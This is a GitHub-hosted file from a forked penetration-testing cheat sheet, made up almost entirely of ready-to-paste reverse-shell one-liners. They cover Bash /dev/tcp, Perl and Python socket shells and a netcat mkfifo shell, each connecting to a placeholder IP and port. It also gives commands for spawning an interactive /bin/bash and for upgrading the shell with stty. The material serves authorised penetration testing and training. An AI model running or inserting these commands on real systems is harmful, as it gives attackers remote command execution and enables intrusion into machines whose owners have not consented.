forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
shell
48 lines (36 loc) · 1.21 KB
/
shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# REVERSE SHELL
# Userfull shell generator
# cheat shellrator
shellrator -h
# Bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
# Perl
perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f
# More reverse shell
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# Interactive shell
# Python
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Bash
echo os.system('/bin/bash')
# Sh
/bin/bash -i
# Perl
perl -e 'exec "/bin/bash"'
# Ruby
exec "/bin/bash"
# Lua
os.execute('/bin/bash')
# Adjust Interactive shell
stty size # Find your terminal size -> 50 235
Ctrl-Z
stty raw -echo // Disable shell echo
fg
export SHELL=bash
export TERM=xterm OR export TERM=xterm-256color
stty rows 50 columns 235